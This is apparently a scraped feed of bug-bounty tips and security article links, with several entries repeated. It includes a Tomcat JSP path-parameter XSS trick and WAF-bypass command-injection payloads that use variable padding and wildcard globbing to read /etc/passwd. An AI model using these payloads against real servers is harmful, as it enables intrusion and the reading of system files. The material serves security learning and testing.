Use path parameters if server is Apache Tomcat & running jsp pages . Like
http://site.com/test.jsp;test=<payload>
, This pages can sometimes give xss.
#bugbounty
http://site.com/test.jsp;test=<payload>
, This pages can sometimes give xss.
#bugbounty
#WAF #ModSecurity #RCE #Payloads Detection #Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
JSON Web Tokens vs. Session Cookies for Authentication
https://t.co/ok14MFmdvL
Remembering the Shellshock Vulnerability
https://t.co/xUGGhKSvP5
4 Uncommon Python Tricks You Should Learn
https://t.co/bOOvVe92Us
#bugbountytips
https://t.co/ok14MFmdvL
Remembering the Shellshock Vulnerability
https://t.co/xUGGhKSvP5
4 Uncommon Python Tricks You Should Learn
https://t.co/bOOvVe92Us
#bugbountytips
Content Security Policy (CSP) Bypasses http://ghostlulz.com/content-security-policy-csp-bypasses/
Everything you want to know about IOT Security ! Simplified https://medium.com/bugbountywriteup/everything-you-want-to-know-about-iot-security-simplified-7dca1b9e1c22
Medium
Everything you want to know about IOT Security ! Simplified
The Internet of things is a network of devices that are connected to the Internet, controlled through it, and can exchange data with each…
Account takeover via postMessage: https://yxw21.github.io/2020/06/05/Account-Takeover-Via-PostMessage/
How to write a Bug Bounty report: http://10degres.net/how-to-write-a-bug-bounty-report/
Gwendal Le Coguic
How to write a Bug Bounty report
One of the first thing I learned when I started security, is that the report is just as important as the pentest itself.
Some bug bounty platforms give reputation points according the quality.
While there is no official rules to write a good report, there…
Some bug bounty platforms give reputation points according the quality.
While there is no official rules to write a good report, there…
“Penetration Testing Roadmap” by Knightsbr1dge https://link.medium.com/8ZZhEUqF86
Medium
Penetration Testing Roadmap
Knightsbr1dge.red
JSMon: Automated JavaScript File Monitoring
https://blog.r0b.re/hacking/pentesting/bugbounty/recon/web/js/2020/07/05/jsmon-automated-javascript-file-monitoring.html
https://blog.r0b.re/hacking/pentesting/bugbounty/recon/web/js/2020/07/05/jsmon-automated-javascript-file-monitoring.html
r0bre’s blog
JSMon: Automated JavaScript file monitoring
JSMon: Automated JavaScript File Monitoring Today I’m proud to release JSMon, an online change monitoring tool for javascript files!
Exploiting Imported Libraries to Bypass Cloudflare WAF
https://medium.com/bugbountywriteup/exploiting-imported-libraries-to-bypass-cloudflare-waf-7aed99186c5a
https://medium.com/bugbountywriteup/exploiting-imported-libraries-to-bypass-cloudflare-waf-7aed99186c5a
Medium
Exploiting Imported Libraries to Bypass WAF
Turning a P5 Content Injection into P3 Reflected XSS
https://upvir.al/ref/tH46562573/
Reserve your seat for an exciting event in Cybersecurity training this September.
All attendees will receive the benefits of
EC-Council Community Membership for Free.
Reserve your seat for an exciting event in Cybersecurity training this September.
All attendees will receive the benefits of
EC-Council Community Membership for Free.